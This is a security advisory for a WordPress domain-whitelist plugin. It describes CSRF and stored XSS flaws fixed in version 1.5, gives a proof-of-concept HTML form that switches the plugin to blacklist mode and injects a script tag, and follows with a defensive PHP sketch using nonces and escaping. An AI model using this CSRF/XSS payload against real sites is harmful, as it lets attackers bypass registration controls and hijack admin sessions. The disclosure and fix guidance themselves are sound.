CVSS Summary
Score | 5.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | None |
Last revised:
Contains a CSRF vulnerability which would allow anybody to create a page which, when visited by a logged-in admin user, could set any options within the plugin (thus allowing the plugin’s access control to be circumvented).
Contains a stored XSS vulnerability which would allow anybody to create a page which, when visited by a logged-in admin, would give the attacker full access to do anything the admin user can do within the admin interface.
Current state: Fixed
Here’s a simple form which switches the mode to blacklist, which would allow anybody to register (assuming it was previously in whitelist mode). It also stores some XSS, which will be displayed to the admin user and will be displayed again on subsequent visits to that page.
```html
<form action="http://localhost/wp-admin/options-general.php?page=user-domain-whitelist.php" method="POST">
  <input type="text" name="update_HMUserDomainWhitelist" value="1">
  <input type="text" name="mode" value="black">
  <input type="text" name="domain_whitelist" value="</textarea><script>alert(1)</script>">
  <input type="submit">
</form>
```
Once the admin is cajoled into visiting a link of the attacker’s choosing (via spearphishing, perhaps), no further user interaction is required, as the form can be submitted on page load with JavaScript.
Update to version 1.5.
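
For maintainers reviewing similar settings pages, the sketch below shows the three controls whose absence this advisory describes: a capability check, a nonce check on save, and escaping of the stored value on output. It is an added example, not the plugin's code or its 1.5 patch. The POST field names are taken from the form above; the `udw_*` function names, the nonce action and field, the option names and the `white` mode value are assumptions.

```php
<?php
// Added illustration, not the plugin's code; runs inside WordPress admin.
// Hypothetical: udw_* functions, 'udw_save'/'udw_nonce', the 'udw_mode' and
// 'udw_domains' options, and 'white' as the whitelist mode value.
function udw_handle_save() {
    if ( ! isset( $_POST['update_HMUserDomainWhitelist'] ) ) {
        return;
    }
    // Authorization: only administrators may change the registration policy.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // CSRF: aborts unless the POST carries a nonce issued to this user for this
    // action, which a form hosted on another site cannot supply.
    check_admin_referer( 'udw_save', 'udw_nonce' );

    // Accept only known modes; anything else falls back to the restrictive one.
    $mode = ( isset( $_POST['mode'] ) && 'black' === $_POST['mode'] ) ? 'black' : 'white';
    // Keep only lines that look like hostnames, so markup is never stored.
    $raw     = isset( $_POST['domain_whitelist'] ) && is_string( $_POST['domain_whitelist'] )
        ? wp_unslash( $_POST['domain_whitelist'] ) : '';
    $domains = array();
    foreach ( preg_split( '/\R/', $raw ) as $line ) {
        $line = strtolower( trim( $line ) );
        if ( preg_match( '/^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$/', $line ) ) {
            $domains[] = $line;
        }
    }
    update_option( 'udw_mode', $mode );
    update_option( 'udw_domains', implode( "\n", $domains ) );
}
add_action( 'admin_init', 'udw_handle_save' );

// Settings page callback (its registration with add_options_page() is omitted).
function udw_render_form() {
    $mode    = get_option( 'udw_mode', 'white' );
    $domains = (string) get_option( 'udw_domains', '' );
    // esc_textarea() below makes a stored "</textarea>" render as plain text.
    ?>
    <form method="post">
        <?php wp_nonce_field( 'udw_save', 'udw_nonce' ); ?>
        <input type="hidden" name="update_HMUserDomainWhitelist" value="1">
        <select name="mode">
            <option value="white" <?php selected( $mode, 'white' ); ?>>Whitelist</option>
            <option value="black" <?php selected( $mode, 'black' ); ?>>Blacklist</option>
        </select>
        <textarea name="domain_whitelist"><?php echo esc_textarea( $domains ); ?></textarea>
        <?php submit_button(); ?>
    </form>
    <?php
}
```

Input filtering and output escaping are both kept here so that a value written to the option by some other path is still rendered inertly.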